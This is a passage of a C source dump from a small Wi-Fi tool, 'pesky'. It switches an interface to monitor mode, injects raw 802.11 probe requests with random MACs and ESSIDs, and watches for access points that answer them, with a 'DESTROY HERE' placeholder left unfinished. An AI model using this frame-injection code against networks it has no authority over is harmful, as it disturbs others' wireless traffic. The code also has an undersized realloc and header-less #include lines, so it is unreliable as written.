*iwr; 142 | 143 | iwr = malloc(sizeof(struct iwreq)); 144 | if (iwr == NULL) { 145 | perror("can't allocate memory"); 146 | exit(1); 147 | } 148 | memset(iwr, 0x00, sizeof(struct iwreq)); 149 | 150 | strncpy(iwr->ifr_name, intname, strlen(intname)); 151 | if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { 152 | perror("can't open socket"); 153 | exit(1); 154 | } 155 | if (ioctl(sock, SIOCGIWFREQ, iwr) < 0) { 156 | close(sock); 157 | free(iwr); 158 | perror("can't get frequency"); 159 | exit(1); 160 | } 161 | 162 | channel = frequencytochannel(iwr->u.freq.m); 163 | free(iwr); 164 | close(sock); 165 | 166 | return (channel); // make this channel 167 | } 168 | 169 | int setmonitor(char *intname) { 170 | int sock; 171 | 172 | struct iwreq *iwr; 173 | struct ifreq *ifr; 174 | 175 | iwr = malloc(sizeof(struct iwreq)); 176 | if (iwr == NULL) { 177 | perror("can't allocate memory"); 178 | exit(1); 179 | } 180 | strncpy(iwr->ifr_name, intname, strlen(intname)); 181 | 182 | ifr = malloc(sizeof(struct ifreq)); 183 | if (ifr == NULL) { 184 | perror("can't allocate memory"); 185 | exit(1); 186 | } 187 | strncpy(ifr->ifr_name, intname, strlen(intname)); 188 | 189 | // open up a socket for subsequent IOCTL calls 190 | if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { 191 | perror("can't open socket"); 192 | exit(1); 193 | } 194 | // get the current mode settings for interface 195 | if (ioctl(sock, SIOCGIWMODE, iwr) < 0) { 196 | close(sock); 197 | free(iwr); 198 | perror("can't read mode"); 199 | exit(1); 200 | } 201 | iwr->u.mode = IW_MODE_MONITOR; // make it monitor mode 202 | 203 | // set monitor mode 204 | if (ioctl(sock, SIOCSIWMODE, iwr) < 0) { 205 | close(sock); 206 | free(iwr); 207 | perror("can't read mode"); 208 | exit(1); 209 | } 210 | // get socket flags for subsquently setting interface to "up" 211 | if (ioctl(sock, SIOCGIFFLAGS, ifr) < 0) { 212 | close(sock); 213 | free(ifr); 214 | perror("can't read interface state"); 215 | exit(1); 216 | } 217 | // these flags make the interface up and broadcast/multicast 218 | ifr->ifr_flags = IFF_UP | IFF_BROADCAST | IFF_RUNNING | IFF_MULTICAST; 219 | // DO IT! 220 | if (ioctl(sock, SIOCSIFFLAGS, ifr) < 0) { 221 | close(sock); 222 | free(ifr); 223 | perror("can't read interface state"); 224 | exit(1); 225 | } 226 | 227 | free(iwr); 228 | free(ifr); 229 | close(sock); 230 | 231 | return (0); 232 | } 233 | -------------------------------------------------------------------------------- /pesky/network.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | 35 | int sendframe(uint8_t * buf, int buflen, char *intname); 36 | int setchannel(char *intname, int channel); 37 | int setmonitor(char *intname); 38 | uint8_t getchannel(char *intname); 39 | -------------------------------------------------------------------------------- /pesky/rand.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | 43 | // get random 16 bit # 44 | uint16_t getrand16() { 45 | int fd; 46 | uint16_t rand; 47 | 48 | fd = open("/dev/urandom", O_RDONLY); 49 | if (fd == -1) { 50 | perror("can't read /dev/urandom"); 51 | exit(1); 52 | } 53 | if (read(fd, &(rand), 2) == 0) { 54 | rand = 0x00; 55 | } 56 | 57 | close(fd); 58 | return (rand); 59 | } 60 | 61 | 62 | // get random 16 bit # 63 | uint8_t getrand8() { 64 | int fd; 65 | uint8_t rand; 66 | 67 | fd = open("/dev/urandom", O_RDONLY); 68 | if (fd == -1) { 69 | perror("can't read /dev/urandom"); 70 | exit(1); 71 | } 72 | if (read(fd, &(rand), 1) == 0) { 73 | rand = 0x00; 74 | } 75 | 76 | close(fd); 77 | return (rand); 78 | } 79 | 80 | // fill a string with random stuff 81 | // "mode" is actually a string with charactes you want to choose from 82 | int fillstr(char *str, int len, char *mode) { 83 | int i; 84 | for (i = 0; i < len; i++) { 85 | str[i] = mode[getrand16() % strlen(mode)]; 86 | } 87 | str[i] = 0x00; 88 | return (0); 89 | } 90 | 91 | // fill a buffer with random values 92 | void fillbuf(uint8_t * buf, int len) { 93 | int fd; 94 | 95 | fd = open("/dev/urandom", O_RDONLY); 96 | if (fd == -1) { 97 | perror("can't read /dev/urandom"); 98 | exit(1); 99 | } 100 | 101 | if (read(fd, buf, len) == 0) { 102 | memset(buf, 0x00, len); 103 | } 104 | close(fd); 105 | } 106 | -------------------------------------------------------------------------------- /pesky/rand.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | uint16_t getrand16(); 34 | uint8_t getrand8(); 35 | int fillstr(char *str, int len, char *mode); 36 | void fillbuf(uint8_t * buf, int len); 37 | 38 | 39 | #define CHARALPHAUPPER "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 40 | #define CHARALPHALOWER "abcdefghijklmnopqrstuvwxyz" 41 | #define CHARNUM "0123456789" 42 | #define CHAREVERYTHING "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz01234567890~!@#$%^&*()_+`-={}|[]:\"\\;':<>?,./" 43 | -------------------------------------------------------------------------------- /pesky/sendproberequest.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include "eth.h" 39 | #include "eapmap.h" 40 | #include "rand.h" 41 | #include "network.h" 42 | #include "global.h" 43 | 44 | #define PROBEREQUEST_TAGS "\x01\x04\x02\x04\x0b\x16\x32\x08\x0c\x12\x18\x24\x30\x48\x60\x6c\x2d\x1a\x2d\x00\x17\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x08\x04\x00\x08\x84\x00\x00\x00\x40\x6b\x07\x0f\xff\xff\xff\xff\xff\xff\xdd\x0b\x00\x17\xf2\x0a\x00\x01\x04\x00\x00\x00\x00\xdd\x08\x00\x50\xf2\x08\x00\x10\x00\x00\xdd\x09\x00\x10\x18\x02\x00\x00\x10\x00\x00" 45 | 46 | 47 | struct wifi_proberesponse { 48 | uint8_t type; 49 | uint8_t flags; 50 | uint16_t duration; 51 | uint8_t destmac[6]; 52 | uint8_t srcmac[6]; 53 | uint8_t bssid[6]; 54 | uint16_t sequence; 55 | }; 56 | 57 | struct __attribute__ ((packed, aligned(1))) 58 | proberequest { 59 | struct radiotap_header radiotap; 60 | uint8_t padding[10]; 61 | struct wifi_proberesponse probe; 62 | }; 63 | 64 | 65 | 66 | void *sendproberequest(void *threadid) { 67 | uint8_t *packet; 68 | int probelen; 69 | struct proberequest *pr; 70 | struct wifi_tag *tag; 71 | char *p, *q; 72 | int numberofchannels = 0; 73 | int *channellist; 74 | int i = 0; 75 | 76 | channellist = (int *) malloc(sizeof(int)); 77 | if (channellist == NULL) { 78 | perror("can't allocate memory"); 79 | exit(1); 80 | } 81 | 82 | for (p = channelmask; (q = strtok(p, " ,")); p = NULL) { 83 | printf("%s\n", q); 84 | channellist[numberofchannels] = atoi(q); 85 | channellist = realloc(channellist, ++numberofchannels); 86 | if (channellist == NULL) { 87 | perror("can't allocate memory"); 88 | exit(1); 89 | } 90 | channellist[numberofchannels] = 0; 91 | } 92 | // put the interface in monitor mode 93 | // putting this before the sniff loop, so we don't keep doing it 94 | setmonitor(intname); 95 | 96 | for (;;) { 97 | localmac = (uint8_t *) malloc(LEN_MAC); 98 | if (localmac == NULL) { 99 | perror("can't allocate memory"); 100 | exit(1); 101 | } 102 | essid = (uint8_t *) malloc(LEN_ESSID_MAX); 103 | if (essid == NULL) { 104 | perror("can't allocate memory"); 105 | exit(1); 106 | } 107 | memset(essid, 0x00, LEN_ESSID_MAX); 108 | fillstr((char *) essid, 109 | LEN_ESSID_MIN + getrand16() % (LEN_ESSID_MAX - 110 | LEN_ESSID_MIN), 111 | CHARALPHALOWER); 112 | fillbuf(localmac, LEN_MAC); 113 | 114 | probelen = 115 | sizeof(struct proberequest) + strlen((char *) essid) + 2 + 3 + 116 | 4 + sizeof(PROBEREQUEST_TAGS); 117 | 118 | packet = (uint8_t *) malloc(probelen); 119 | if (packet == NULL) { 120 | perror("can't allocate memory"); 121 | exit(1); 122 | } 123 | memset(packet, 0x00, probelen); 124 | pr = (struct proberequest *) packet; 125 | 126 | pr->radiotap.len = 0x12; 127 | 128 | pr->probe.type = 0x40; 129 | memset(pr->probe.destmac, 0xff, LEN_MAC); 130 | memcpy(pr->probe.srcmac, localmac, LEN_MAC); 131 | memset(pr->probe.bssid, 0xff, LEN_MAC); 132 | pr->probe.sequence = getrand16(); 133 | 134 | tag = (struct wifi_tag *) (packet + sizeof(struct proberequest)); 135 | tag->len = strlen((char *) essid); 136 | memcpy(tag->contents, essid, strlen((char *) essid)); 137 | tag = 138 | (struct wifi_tag *) (packet + sizeof(struct proberequest) + 139 | strlen((char *) essid) + 2); 140 | tag->type = 0x03; 141 | tag->len = 0x01; 142 | tag->contents[0] = getchannel(intname); 143 | 144 | memcpy((uint8_t *) tag + 3, PROBEREQUEST_TAGS, 145 | sizeof(PROBEREQUEST_TAGS)); 146 | 147 | 148 | printf("SENDING QUERY FOR %s\n", essid); 149 | // if we are at the end of the list go back to the beginning 150 | if (numberofchannels != 0) { 151 | if (channellist[i] == 0) { 152 | i = 0; 153 | } 154 | // set the channel to the next one on the list 155 | printf("setting freq to %i\n", channellist[i]); 156 | setchannel(intname, channellist[i++]); 157 | // if we only want one channel, try not to set it again 158 | if (numberofchannels == 1) { 159 | numberofchannels = 0; 160 | 161 | } 162 | } 163 | sendframe((uint8_t *) pr, probelen, intname); 164 | 165 | free(packet); 166 | free(localmac); 167 | sleep(10); 168 | } 169 | } 170 | -------------------------------------------------------------------------------- /pesky/sendprobes.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include "eth.h" 38 | #include "eapmap.h" 39 | #include "rand.h" 40 | #include "network.h" 41 | 42 | #define PROBEREQUEST_TAGS "\x01\x04\x02\x04\x0b\x16\x32\x08\x0c\x12\x18\x24\x30\x48\x60\x6c\x2d\x1a\x2d\x00\x17\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x08\x04\x00\x08\x84\x00\x00\x00\x40\x6b\x07\x0f\xff\xff\xff\xff\xff\xff\xdd\x0b\x00\x17\xf2\x0a\x00\x01\x04\x00\x00\x00\x00\xdd\x08\x00\x50\xf2\x08\x00\x10\x00\x00\xdd\x09\x00\x10\x18\x02\x00\x00\x10\x00\x00" 43 | 44 | 45 | struct wifi_proberesponse { 46 | uint8_t type; 47 | uint8_t flags; 48 | uint16_t duration; 49 | uint8_t destmac[6]; 50 | uint8_t srcmac[6]; 51 | uint8_t bssid[6]; 52 | uint16_t sequence; 53 | }; 54 | 55 | struct __attribute__ ((packed, aligned(1))) 56 | proberequest { 57 | struct radiotap_header radiotap; 58 | uint8_t padding[10]; 59 | struct wifi_proberesponse probe; 60 | }; 61 | 62 | 63 | int hexdump(uint8_t * buf, int buflen) { 64 | int i; 65 | int pos; 66 | 67 | pos = 0; 68 | printf("\n"); 69 | for (i = 0; i < buflen; i++) { 70 | printf("%02x ", buf[i]); 71 | pos++; 72 | if (pos == 16) { 73 | printf("\n"); 74 | pos = 0; 75 | } 76 | if (pos == 8) { 77 | printf(" "); 78 | } 79 | } 80 | printf("\n"); 81 | return (0); 82 | } 83 | 84 | 85 | int sendprobes() { 86 | uint8_t *packet; 87 | int probelen; 88 | struct proberequest *pr; 89 | struct wifi_tag *tag; 90 | 91 | // ARGS 92 | uint8_t *localmac = (uint8_t *) "\x40\x33\x1a\xec\x52\x74"; 93 | uint8_t *essid = (uint8_t *) "VENTURA-NET"; 94 | char *intname = "wlan0"; 95 | // 96 | 97 | // 2 == tag headers for ssid tab 98 | // 3 == tag headers and one byte for frequency 99 | // 4 == 32 bit CRC 100 | probelen = 101 | sizeof(struct proberequest) + strlen((char *) essid) + 2 + 3 + 4 + 102 | sizeof(PROBEREQUEST_TAGS); 103 | 104 | packet = (uint8_t *) malloc(probelen); 105 | if (packet == NULL) { 106 | perror("can't allocate memory"); 107 | exit(1); 108 | } 109 | memset(packet, 0x00, probelen); 110 | pr = (struct proberequest *) packet; 111 | 112 | pr->radiotap.len = 0x12; 113 | 114 | pr->probe.type = 0x40; 115 | memset(pr->probe.destmac, 0xff, LEN_MAC); 116 | memcpy(pr->probe.srcmac, localmac, LEN_MAC); 117 | memset(pr->probe.bssid, 0xff, LEN_MAC); 118 | pr->probe.sequence = getrand16(); 119 | 120 | tag = (struct wifi_tag *) (packet + sizeof(struct proberequest)); 121 | tag->len = strlen((char *) essid); 122 | memcpy(tag->contents, essid, strlen((char *) essid)); 123 | tag = 124 | (struct wifi_tag *) (packet + sizeof(struct proberequest) + 125 | strlen((char *) essid) + 2); 126 | tag->type = 0x03; 127 | tag->len = 0x01; 128 | tag->contents[0] = getchannel(intname); 129 | memcpy((uint8_t *) tag + 4, PROBEREQUEST_TAGS, 130 | sizeof(PROBEREQUEST_TAGS)); 131 | printf("%i\n", sizeof(struct proberequest)); 132 | printf("%i\n", sizeof(PROBEREQUEST_TAGS)); 133 | 134 | 135 | hexdump((uint8_t *) pr, probelen); 136 | 137 | free(pr); 138 | return (0); 139 | } 140 | -------------------------------------------------------------------------------- /pesky/sniffloop.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include 46 | #include 47 | #include "eth.h" 48 | #include "rand.h" 49 | #include "getbssid.h" 50 | #include "global.h" 51 | 52 | 53 | void *sendproberequest(void *threadid); 54 | int sendframe(uint8_t * buf, int buflen, char *intname); 55 | int getmonsock(char *intname); 56 | int setchannel(char *intname, int channel); 57 | 58 | #define PAUSETEMPLATE "\x00\x00\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x02\x00\x00\xff\xff\xff\xff\xff\xff\x00\x15\x6d\x85\x98\x84\x3c\x15\xc2\xe1\xfb\x50\x50\x40\xaa\xaa\x03\x00\x00\x00\x88\x08\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x63\x61\x6e\x27\x74\x20\x6f\x70\x65\xec\x50\x78\xa" 59 | 60 | int hexdump(uint8_t * buf, int buflen) { 61 | int i; 62 | int pos; 63 | 64 | pos = 0; 65 | printf("\n"); 66 | for (i = 0; i < buflen; i++) { 67 | printf("%02x ", buf[i]); 68 | pos++; 69 | if (pos == 16) { 70 | printf("\n"); 71 | pos = 0; 72 | } 73 | if (pos == 8) { 74 | printf(" "); 75 | } 76 | } 77 | printf("\n"); 78 | return (0); 79 | } 80 | 81 | int usage(char *progname) { 82 | printf("Usage:\n"); 83 | printf("%s\n", progname); 84 | printf("\t-h\tDisplays this message\n"); 85 | printf("\t-i\tinterface to use\t(example: wlan0)\n"); 86 | printf("\t-c\tchannel to use\n"); 87 | return (0); 88 | } 89 | 90 | 91 | int main(int argc, char *argv[]) { 92 | int c; 93 | int sock; 94 | int pktlen; 95 | uint8_t *pos; 96 | uint8_t *pkt; 97 | struct wifi_tag *tag; 98 | struct wifi_header *wh; 99 | struct wifi_probe *wp; 100 | struct radiotap_header *rth; 101 | struct ifreq ifr; 102 | 103 | int rval; 104 | pthread_t threads[5]; 105 | 106 | while ((c = getopt(argc, argv, "c:hi:")) != -1) { 107 | switch (c) { 108 | case 'h': // usage 109 | usage(argv[0]); 110 | 111 | exit(0); 112 | break; 113 | case 'i': // what interface do you want to use? 114 | intname = optarg; 115 | break; 116 | case 'c': 117 | channelmask = optarg; 118 | break; 119 | default: 120 | break; 121 | } 122 | } 123 | 124 | 125 | 126 | sock = getmonsock(intname); 127 | memset(&ifr, 0x00, sizeof(struct ifreq)); 128 | strncpy(ifr.ifr_name, intname, IFNAMSIZ); 129 | 130 | if (ioctl(sock, SIOCGIFFLAGS, &ifr) < 0) { 131 | perror("can't get socket info"); 132 | exit(1); 133 | } 134 | ifr.ifr_flags |= IFF_PROMISC; 135 | if (ioctl(sock, SIOCSIFFLAGS, &ifr) < 0) { 136 | perror("can't set promic"); 137 | exit(1); 138 | } 139 | if (ioctl(sock, SIOCGIFINDEX, &ifr) == -1) { 140 | perror("can't retrieve etherenet index\n"); 141 | exit(1); 142 | } 143 | 144 | if (pthread_create(&threads[0], NULL, sendproberequest, NULL) != 0) { 145 | perror("can't thread"); 146 | exit(1); 147 | } 148 | 149 | pkt = (uint8_t *) malloc(MAXPACKET); 150 | if (pkt == NULL) { 151 | perror("can't allocate memory"); 152 | exit(1); 153 | } 154 | 155 | rth = (struct radiotap_header *) pkt; 156 | 157 | for (rval = 0; rval >= 0; rval = read(sock, pkt, MAXPACKET)) { 158 | if (rval > 0) { 159 | pktlen = rval - rth->len; 160 | wh = (struct wifi_header *) (pkt + rth->len); 161 | wp = (struct wifi_probe *) (pkt + rth->len + 162 | sizeof(struct wifi_header)); 163 | 164 | 165 | if (wh->type == 0x50) { 166 | // start processing all the tags 167 | // this for loop goes through them 168 | for (pos = (uint8_t *) wp->tag; 169 | pos < (uint8_t *) wp->tag + pktlen; 170 | pos += (tag->len + 2)) { 171 | tag = (struct wifi_tag *) pos; 172 | // if it defines an ESSID 173 | // compare it against the one we oant 174 | if (tag->type == 0x00) { 175 | //write(1, tag->contents, tag->len); 176 | // if essid matches the one we want 177 | // return the bssid 178 | if (memcmp 179 | (essid, tag->contents, 180 | strlen((char *) essid)) == 0) { 181 | printf("handshake detected\n"); 182 | 183 | // DESTROY HERE!!!!!! 184 | close(sock); 185 | free(pkt); 186 | return (0); 187 | } 188 | } 189 | 190 | } 191 | } 192 | 193 | 194 | } 195 | } 196 | 197 | return (0); 198 | } 199 | -------------------------------------------------------------------------------- /pesky/table.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR 